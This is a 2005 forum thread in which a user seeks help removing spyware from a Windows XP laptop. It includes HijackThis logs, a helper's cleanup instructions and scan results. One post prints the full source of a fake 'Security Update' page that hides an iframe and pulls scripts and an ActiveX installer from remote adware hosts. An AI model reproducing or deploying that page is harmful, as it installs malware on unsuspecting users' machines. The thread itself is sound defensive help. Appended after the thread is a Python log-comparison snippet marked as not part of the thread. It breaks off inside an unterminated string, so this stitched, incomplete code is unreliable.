
Suspicious Stuff on my machine

First time in this or any other forum like this, so if this is old hat to anyone, please forgive me...

My machine won't let me open Task Manager, regedit, event viewer or msconfig. I've been able to see Task Manager and regedit for a couple seconds, but never have been able to see msconfig or event viewer since I noticed the problem earlier today. Also, the little yellow shield icon that says "downloading updates" for the McAfee antivirus will hang up at 1% whenever I log on to the internet. As if that wasn't enough, when I try and open task manager, I can see the little green icon in the lower right near the clock, but it disappears as soon as I mouse over it. It comes back if I try and start Task Mgr again and stays after Task Mgr window disappears, but will always disappear as soon as I mouse over it again. I can even make the green icon appear in multiple instances, but all of them will disappear as soon as I mouse over one of them. I've rebooted and run a McAfee virus scan, finding the bestfriends[1].pif, and gone through the steps to get rid of that, (I think successfully) but symptoms remain.

Running winXP, IBM R40 laptop, also used by my 13 yo daughter...grrr...

Anyone, please help!!

Thanks,
Matt

Comments

  • Buckeye_Sam Columbus, Ohio
    edited February 2005
    We need to see what's going on in your computer. Please post a hijackthis log.

    http://www.short-media.com/forum/showpost.php?p=172584&postcount=2
  • edited February 2005
    Thanks for the reply. I've begun to notice some other symptoms as well. I can't open the disk defrag application, and I can't get into "manage" through MyComputer>manage. Also, my AOL settings seem to be changing by themselves, such as my background preference being repeatedly set to default, and I think some applications have been closing by themselves for no reason, but I'm not positive of that one, as I work with a LOT of applications open at a time and could have closed a few without remembering I did it. I'm wondering if this is an AOL-specific thing, because of the fact that it's affecting AOL the way it is.


    Logfile of HijackThis v1.99.0
    Scan saved at 7:52:10 AM, on 2/15/2005
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\System32\ibmpmsvc.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\S24EvMon.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
    C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
    C:\WINDOWS\System32\Ati2evxx.exe
    C:\WINDOWS\system32\drivers\KodakCCS.exe
    c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
    C:\WINDOWS\System32\QCONSVC.EXE
    C:\WINDOWS\System32\RegSrvc.exe
    C:\WINDOWS\system32\ScsiAccess.EXE
    C:\WINDOWS\system32\TpKmpSVC.exe
    C:\WINDOWS\wanmpsvc.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
    C:\WINDOWS\system32\RunDll32.exe
    C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
    C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
    C:\Program Files\ThinkPad\PkgMgr\HOTKEY\TPONSCR.exe
    C:\Program Files\ThinkPad\PkgMgr\HOTKEY_1\TpScrex.exe
    C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
    C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
    C:\WINDOWS\AGRSMMSG.exe
    C:\WINDOWS\system32\dla\tfswctrl.exe
    C:\WINDOWS\system32\r3proxy.exe
    C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
    C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe
    C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
    C:\PROGRA~1\mcafee.com\agent\mcagent.exe
    c:\progra~1\mcafee.com\vso\mcvsescn.exe
    C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLHOS~1.EXE
    C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
    C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
    C:\Program Files\Real\RealPlayer\RealPlay.exe
    C:\WINDOWS\system32\SINSTANTM.EXE
    C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLServiceHost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\Program Files\Internet Explorer\iexplore.exe
    c:\PROGRA~1\mcafee.com\vso\mcshield.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\America Online 9.0a\waol.exe
    C:\Documents and Settings\Matt\My Documents\Adware Utilities\hijackthis\HijackThis.exe
    C:\Program Files\America Online 9.0a\shellmon.exe

    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
    O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
    O4 - HKLM\..\Run: [S3TRAY2] S3Tray2.exe
    O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
    O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe irprops.cpl,,BluetoothAuthenticationAgent
    O4 - HKLM\..\Run: [TPHOTKEY] C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
    O4 - HKLM\..\Run: [BMMGAG] RunDll32 C:\PROGRA~1\ThinkPad\UTILIT~1\pwrmonit.dll,StartPwrMonitor
    O4 - HKLM\..\Run: [TPTRAY] C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
    O4 - HKLM\..\Run: [QCWLICON] C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
    O4 - HKLM\..\Run: [TPKMAPHELPER] C:\Program Files\ThinkPad\Utilities\TpKmapAp.exe -helper
    O4 - HKLM\..\Run: [TP4EX] tp4ex.exe
    O4 - HKLM\..\Run: [NPDTray] C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
    O4 - HKLM\..\Run: [EZEJMNAP] C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
    O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
    O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
    O4 - HKLM\..\Run: [StorageGuard] "c:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
    O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
    O4 - HKLM\..\Run: [Fellowes Proxy] C:\WINDOWS\system32\r3proxy.exe
    O4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1100837085\EE\AOLHostManager.exe
    O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
    O4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"
    O4 - HKLM\..\Run: [VSOCheckTask] "c:\PROGRA~1\mcafee.com\vso\mcmnhdlr.exe" /checktask
    O4 - HKLM\..\Run: [VirusScan Online] "c:\PROGRA~1\mcafee.com\vso\mcvsshld.exe"
    O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
    O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
    O4 - HKLM\..\Run: [Pure Networks Port Magic] "C:\PROGRA~1\PURENE~1\PORTMA~1\PortAOL.exe" -Run
    O4 - HKLM\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
    O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
    O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
    O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
    O4 - HKLM\..\Run: [Scuba Instant Messenger] SINSTANTM.EXE
    O4 - HKCU\..\Run: [AOL Fast Start] "C:\Program Files\America Online 9.0a\AOL.EXE" -b
    O4 - HKCU\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
    O4 - HKCU\..\RunOnce: [Scuba Instant Messenger] SINSTANTM.EXE
    O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
    O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
    O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
    O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.av.aol.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
    O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.av.aol.com/molbin/shared/mcgdmgr/en-us/1,0,0,20/mcgdmgr.cab
    O16 - DPF: {D719897A-B07A-4C0C-AEA9-9B663A28DFCB} (iTunesDetector Class) - http://ax.phobos.apple.com.edgesuite.net/detection/ITDetector.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{3B6F6C4F-0C50-4BB3-B7BB-49EE0C30ED4E}: NameServer = 66.133.191.35
    O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
    O23 - Service: AOL Connectivity Service - America Online - C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
    O23 - Service: AOL TopSpeed Monitor - America Online, Inc - C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
    O23 - Service: AOL Spyware Protection Service - Unknown - C:\Program Files\Common Files\AOL\AOL Spyware Protection\\aolserv.exe
    O23 - Service: Ati HotKey Poller - Unknown - C:\WINDOWS\System32\Ati2evxx.exe
    O23 - Service: IBM PM Service - Unknown - C:\WINDOWS\System32\ibmpmsvc.exe
    O23 - Service: Kodak Camera Connection Software - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
    O23 - Service: McAfee.com McShield - Unknown - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
    O23 - Service: McAfee SecurityCenter Update Manager - Networks Associates Technology, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
    O23 - Service: McAfee.com VirusScan Online Realtime Engine - Networks Associates Technology, Inc - c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
    O23 - Service: PLSRemote Service - Unknown - C:\WINDOWS\SYSTEM32\PLSRemote.exe
    O23 - Service: QCONSVC - Unknown - C:\WINDOWS\System32\QCONSVC.EXE
    O23 - Service: RegSrvc - Intel Corporation - C:\WINDOWS\System32\RegSrvc.exe
    O23 - Service: Spectrum24 Event Monitor - Intel Corporation - C:\WINDOWS\System32\S24EvMon.exe
    O23 - Service: ScsiAccess - Unknown - C:\WINDOWS\system32\ScsiAccess.EXE
    O23 - Service: IBM KCU Service - Unknown - C:\WINDOWS\system32\TpKmpSVC.exe
    O23 - Service: WAN Miniport (ATW) Service - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe

    Thanks for the help, I really appreciate any advice anyone can offer...

    Matt
  • edited February 2005
    I also found the following code on a recent documents list in my TSW Webcoder... The file is called trufkz.html, and I also found a file called x.bat right next to it in my C: drive that was last modified within 2 minutes of this one. It don't look good...

    When I previewed it, I got a window that said something about a plug in needed, and "You must click 3 times to proceed." I'm guessing my daughter clicked 3 times...

    Can anyone tell what this is doing?

    <html>
    <title> .:(sEcuritY UpdATe):. </title>
    <body>

    <iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
    <script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
    <script language="JavaScript">
    mtrslib_uid = '2396';
    mtrslib_retry = 1;
    mt_set_onload();
    </script>

    <script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a075a97a/a677aa.js"></script>
    <script language="javascript" type="text/javascript">self.focus();</script>

    <script language="JavaScript" type="text/JavaScript" src="http://data.overpro.com/getActivex.aspx?&event_type=onLoad&recurrence=always&retry=3&loadFirst=1&delayLoad=0&affiliateId=f8566799-84af-450a-969e-f6f284a078cd&productId=35f05749-e699-45df-a27f-79c05110c180"></script> <script language="JavaScript">self.focus();</script>

    </body>
    </html>
  • Buckeye_Sam Columbus, Ohio
    edited February 2005
    That code is taking you to two different websites that will install more malware on your computer. Delete it and any other html files that you find with recent dates. Now we'll see what else we can do for you.



    Show hidden files
    http://www.short-media.com/forum/showpost.php?p=172588&postcount=3



    Place a checkmark next to these entries, close all browsers and windows, and have HijackThis fix them by clicking Fix Checked:

    O4 - HKLM\..\Run: [Scuba Instant Messenger] SINSTANTM.EXE
    O4 - HKCU\..\RunOnce: [Scuba Instant Messenger] SINSTANTM.EXE



    Reboot your computer into Safe Mode



    Then delete this file:

    SINSTANTM.EXE



    Reboot back to normal mode.



    Please run these two online scans.
    Make sure they are set to clean automatically:

    http://housecall.trendmicro.com/

    http://www.pandasoftware.com/activescan/com/activescan_principal.htm

    If there are files that can not be removed by the scans please include that information in your next post.



    Next download Ad-aware SE from: http://www.majorgeeks.com/download506.html

    Install the program and launch it.

    First, in the main window, look in the bottom right corner and click on Check for updates now and download the latest reference files.

    Next, we need to configure Ad-aware for a full scan.

    Click on the Gear icon (second from the left) to access the preferences/settings window

    1. In the General window make sure the following are selected:

    * Automatically save log-file
    * Automatically quarantine objects prior to removal
    * Safe Mode (always request confirmation)

    2. Click on the Scanning button on the left and select:

    * Scan Within Archives
    * Scan Active Processes
    * Scan Registry
    * Deep Scan Registry
    * Scan my IE favorites for banned URL’s
    * Scan my Hosts file
    * Under Click here to select drives + folders, choose:
      o All of your hard drives

    Click on the Advanced button on the left and select:

    * Include additional process information
    * Include additional file information
    * Include environment information

    Click the Tweak button and select:

    * Under the Scanning Engine:
      o Unload recognized processes & modules during scan
      o Include additional Ad-aware settings in logfile
    * Under the Cleaning Engine:
      o Let Windows remove files in use at next reboot

    Click on Proceed to save the settings.

    Click Start and on the next screen choose Activate in-depth Scan at the bottom of the page and then choose:

    * Use Custom Scanning Options

    Click Next and Ad-aware will scan your hard drive(s) with the options you have selected.

    Save the log file when it asks and then click Finish

    When finished, mark everything for removal and get rid of it. (Right-click the window and choose Select All from the drop down menu and click Next).





    Reboot and post a new hijackthis log.
  • edited February 2005
    :thumbsup::thumbsup: Sam, my good man, you're a gentleman and a scholar. :thumbsup::thumbsup:
    I followed your instructions to a "T", and all symptoms have disappeared. I'm now able to use Task Manager, Management Console, Event Viewer, msconfig, regedit, and everything else I've tried, and as if that isn't enough, my machine works faster than it has since I bought it.

    I do, however, have an icon on my desktop now that I don't know from where it came. It's transparent like a hidden folder, and it's called "desktop.ini". Looks like any .ini icon, i.e., notepad with a gear on it, just transparent. I have no idea how it got there or why. I hope you can offer some suggestions toward that.

    Per your requests, the following are copies of the HJT and scan logs:

    Logfile of HijackThis v1.99.0
    Scan saved at 2:25:11 AM, on 2/16/2005
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\System32\ibmpmsvc.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\S24EvMon.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
    C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
    C:\WINDOWS\System32\Ati2evxx.exe
    C:\WINDOWS\system32\drivers\KodakCCS.exe
    c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
    C:\WINDOWS\System32\QCONSVC.EXE
    C:\WINDOWS\System32\RegSrvc.exe
    C:\WINDOWS\system32\ScsiAccess.EXE
    C:\WINDOWS\system32\TpKmpSVC.exe
    C:\WINDOWS\wanmpsvc.exe
    c:\PROGRA~1\mcafee.com\vso\mcshield.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
    C:\WINDOWS\system32\RunDll32.exe
    C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
    C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
    C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
    C:\Program Files\ThinkPad\PkgMgr\HOTKEY\TPONSCR.exe
    C:\Program Files\ThinkPad\PkgMgr\HOTKEY_1\TpScrex.exe
    C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
    C:\WINDOWS\system32\r3proxy.exe
    C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
    C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe
    C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
    C:\PROGRA~1\mcafee.com\agent\mcagent.exe
    C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
    c:\progra~1\mcafee.com\vso\mcvsescn.exe
    C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
    C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
    C:\Program Files\Real\RealPlayer\RealPlay.exe
    C:\WINDOWS\system32\dla\tfswctrl.exe
    C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLHOS~1.EXE
    C:\WINDOWS\AGRSMMSG.exe
    C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLServiceHost.exe
    C:\Program Files\America Online 9.0a\waol.exe
    C:\Program Files\America Online 9.0a\shellmon.exe
    C:\WINDOWS\system32\notepad.exe
    C:\Documents and Settings\Matt\My Documents\Adware Utilities\hijackthis\HijackThis.exe

    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 10.1.3.1:8080
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
    O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
    O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe irprops.cpl,,BluetoothAuthenticationAgent
    O4 - HKLM\..\Run: [TPHOTKEY] C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
    O4 - HKLM\..\Run: [BMMGAG] RunDll32 C:\PROGRA~1\ThinkPad\UTILIT~1\pwrmonit.dll,StartPwrMonitor
    O4 - HKLM\..\Run: [TPTRAY] C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
    O4 - HKLM\..\Run: [QCWLICON] C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
    O4 - HKLM\..\Run: [TPKMAPHELPER] C:\Program Files\ThinkPad\Utilities\TpKmapAp.exe -helper
    O4 - HKLM\..\Run: [NPDTray] C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
    O4 - HKLM\..\Run: [EZEJMNAP] C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
    O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
    O4 - HKLM\..\Run: [StorageGuard] "c:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
    O4 - HKLM\..\Run: [Fellowes Proxy] C:\WINDOWS\system32\r3proxy.exe
    O4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1100837085\EE\AOLHostManager.exe
    O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
    O4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"
    O4 - HKLM\..\Run: [VSOCheckTask] "c:\PROGRA~1\mcafee.com\vso\mcmnhdlr.exe" /checktask
    O4 - HKLM\..\Run: [VirusScan Online] "c:\PROGRA~1\mcafee.com\vso\mcvsshld.exe"
    O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
    O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
    O4 - HKLM\..\Run: [Pure Networks Port Magic] "C:\PROGRA~1\PURENE~1\PORTMA~1\PortAOL.exe" -Run
    O4 - HKLM\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
    O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
    O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
    O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
    O4 - HKLM\..\Run: [TP4EX] tp4ex.exe
    O4 - HKLM\..\Run: [S3TRAY2] S3Tray2.exe
    O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
    O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
    O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
    O4 - HKCU\..\Run: [AOL Fast Start] "C:\Program Files\America Online 9.0a\AOL.EXE" -b
    O4 - HKCU\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
    O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
    O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
    O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
    O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.av.aol.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
    O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
    O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
    O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.av.aol.com/molbin/shared/mcgdmgr/en-us/1,0,0,20/mcgdmgr.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{3B6F6C4F-0C50-4BB3-B7BB-49EE0C30ED4E}: NameServer = 66.133.191.35
    O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
    O23 - Service: AOL Connectivity Service - America Online - C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
    O23 - Service: AOL TopSpeed Monitor - America Online, Inc - C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
    O23 - Service: AOL Spyware Protection Service - Unknown - C:\Program Files\Common Files\AOL\AOL Spyware Protection\\aolserv.exe
    O23 - Service: Ati HotKey Poller - Unknown - C:\WINDOWS\System32\Ati2evxx.exe
    O23 - Service: IBM PM Service - Unknown - C:\WINDOWS\System32\ibmpmsvc.exe
    O23 - Service: Kodak Camera Connection Software - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
    O23 - Service: McAfee.com McShield - Unknown - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
    O23 - Service: McAfee SecurityCenter Update Manager - Networks Associates Technology, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
    O23 - Service: McAfee.com VirusScan Online Realtime Engine - Networks Associates Technology, Inc - c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
    O23 - Service: PLSRemote Service - Unknown - C:\WINDOWS\SYSTEM32\PLSRemote.exe
    O23 - Service: QCONSVC - Unknown - C:\WINDOWS\System32\QCONSVC.EXE
    O23 - Service: RegSrvc - Intel Corporation - C:\WINDOWS\System32\RegSrvc.exe
    O23 - Service: Spectrum24 Event Monitor - Intel Corporation - C:\WINDOWS\System32\S24EvMon.exe
    O23 - Service: ScsiAccess - Unknown - C:\WINDOWS\system32\ScsiAccess.EXE
    O23 - Service: IBM KCU Service - Unknown - C:\WINDOWS\system32\TpKmpSVC.exe
    O23 - Service: WAN Miniport (ATW) Service - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe

    ****************************************************
    Activescan (Panda)

    Spyware:Spyware/New.net No disinfected C:\WINDOWS\NDNuninstall*.exe
    (Found and deleted)
    Adware:Adware/WUpd No disinfected Windows Registry
    (Couldn't find, will run a search)

    Adware:Adware/MediaTickets No disinfected C:\Documents and Settings\Matt\Desktop\securityCRAPdate.txt
    (This was a copy of the trufkz code that I saved on my desktop, it's going away)
    Possible Virus. No disinfected C:\IBMTOOLS\APPS\RRPC\DATA1.CAB[setup.EXE][PCRECSA.EXE]
    (This .cab file showed nothing inside, wasn't able to clear this)
    Adware:Adware/MediaTickets No disinfected C:\Install.exe[trufkz.html]
    (This is SO gone)

    Adware:Adware/MediaTickets No disinfected C:\RECYCLER\S-1-5-21-402350127-190368106-1736902927-1004\Dc971.html
    (couldn't find)
    Adware:Adware/WUpd No disinfected C:\RECYCLER\S-1-5-21-402350127-190368106-1736902927-500\Dc1\AdTools.exe
    (couldn't find in this location, but found and deleted AdTools folder)
    Adware:Adware/WUpd No disinfected C:\WINDOWS\Downloaded Program Files\DeskAdX.dll
    (couldn't find in this folder)


    Up against characters-per-post limit...cont'd in following post...
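
Added example (not part of any post in this thread): one way to check a follow-up HijackThis log against the first one, confirming that the entries marked with Fix Checked are gone, that the executable they launched is no longer running, and listing anything that newly appeared. The function names are hypothetical, and the two logs are abridged excerpts of the ones posted above, embedded as constructed sample input.

```python
import re

# HijackThis result lines look like "O4 - HKLM\..\Run: [name] command".
ENTRY_RE = re.compile(r"^([A-Z]\d{1,2}) - (.+)$")
# Command part of an O4 (autorun) entry, up to the first executable extension.
O4_CMD_RE = re.compile(r'\]\s+"?(.+?\.(?:exe|dll|com|bat|pif|scr))', re.I)

# Constructed sample input: abridged excerpts of the two logs in the thread.
BEFORE = r"""Logfile of HijackThis v1.99.0
Scan saved at 7:52:10 AM, on 2/15/2005

Running processes:
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\r3proxy.exe
C:\WINDOWS\system32\SINSTANTM.EXE
C:\Program Files\America Online 9.0a\waol.exe

O4 - HKLM\..\Run: [Fellowes Proxy] C:\WINDOWS\system32\r3proxy.exe
O4 - HKLM\..\Run: [Scuba Instant Messenger] SINSTANTM.EXE
O4 - HKCU\..\Run: [AOL Fast Start] "C:\Program Files\America Online 9.0a\AOL.EXE" -b
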